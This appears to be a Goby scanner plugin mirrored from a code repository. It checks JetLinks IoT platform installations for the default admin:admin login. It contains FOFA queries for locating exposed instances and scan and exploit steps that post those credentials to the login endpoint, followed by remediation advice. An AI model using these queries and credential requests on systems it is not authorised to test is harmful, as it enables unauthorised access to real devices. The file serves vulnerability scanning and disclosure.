qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/JetLinks-Default-password.json

148 lines
5.9 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "JetLinks Default password",
"Description": "<p>Jetlinks open source Internet of things platform is based on Java 8 and spring boot 2 xWebFluxNettyVert. x. Developed by reactor and others, it is an enterprise level Internet of things basic platform that can be used out of the box and secondary development.</p><p>User name admin password admin</p>",
"Product": "JetLinks",
"Homepage": "https://www.jetlinks.cn/",
"DisclosureDate": "2022-03-30",
"Author": "xiaodan",
"FofaQuery": "title=\"JetLinks\"|| body=\"/liveqing/liveplayer-element.min.js\"",
"GobyQuery": "title=\"JetLinks\"|| body=\"/liveqing/liveplayer-element.min.js\"",
"Level": "1",
"Impact": "<p>Jetlinks open source Internet of things platform is based on Java 8 and spring boot 2 xWebFluxNettyVert. x. Developed by reactor and others, it is an enterprise level Internet of things basic platform that can be used out of the box and secondary development.</p><p>User name admin password admin</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/jetlinks/authorize/login",
"follow_redirect": false,
"header": {
"Content-Type": "application/json;charset=UTF-8"
},
"data_type": "text",
"data": "{\"username\":\"admin\",\"password\":\"admin\",\"expires\":3600000,\"tokenType\":\"default\",\"verifyKey\":\"\",\"verifyCode\":\"\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"expires\":3600000,",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/jetlinks/authorize/login",
"follow_redirect": false,
"header": {
"Content-Type": "application/json;charset=UTF-8"
},
"data_type": "text",
"data": "{\"username\":\"admin\",\"password\":\"admin\",\"expires\":3600000,\"tokenType\":\"default\",\"verifyKey\":\"\",\"verifyCode\":\"\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"expires\":3600000,",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|admin:admin"
]
}
],
"Tags": [
"default password"
],
"VulType": [
"default password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
"CNVD-2021-49115"
],
"CVSSScore": "5",
"Translation": {
"CN": {
"Name": "JetLinks 默认密码",
"Product": "JetLinks",
"Description": "<p>JetLinks开源物联网平台基于Java8Spring Boot 2.xWebFluxNettyVert.xReactor等开发是一个开箱即用可二次开发的企业级物联网基础平台。<code></code></p><p>用户名admin密码admin</p>",
"Recommendation": "<p>1、修改默认口令密码最好包含大小写字母、数字和特殊字符等且位数大于8位。</p><p>2、如非必要禁止公网访问该系统。</p><p>3、通过防火墙等安全设备设置访问策略设置白名单访问。</p>",
"Impact": "<p>JetLinks开源物联网平台基于Java8Spring Boot 2.xWebFluxNettyVert.xReactor等开发是一个开箱即用可二次开发的企业级物联网基础平台。</p><p>用户名admin密码admin</p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "JetLinks Default password",
"Product": "JetLinks",
"Description": "<p>Jetlinks open source Internet of things platform is based on Java 8 and spring boot 2 xWebFluxNettyVert. x. Developed by reactor and others, it is an enterprise level Internet of things basic platform that can be used out of the box and secondary development.</p><p>User name admin password admin</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Jetlinks open source Internet of things platform is based on Java 8 and spring boot 2 xWebFluxNettyVert. x. Developed by reactor and others, it is an enterprise level Internet of things basic platform that can be used out of the box and secondary development.</p><p>User name admin password admin</p>",
"VulType": [
"default password"
],
"Tags": [
"default password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink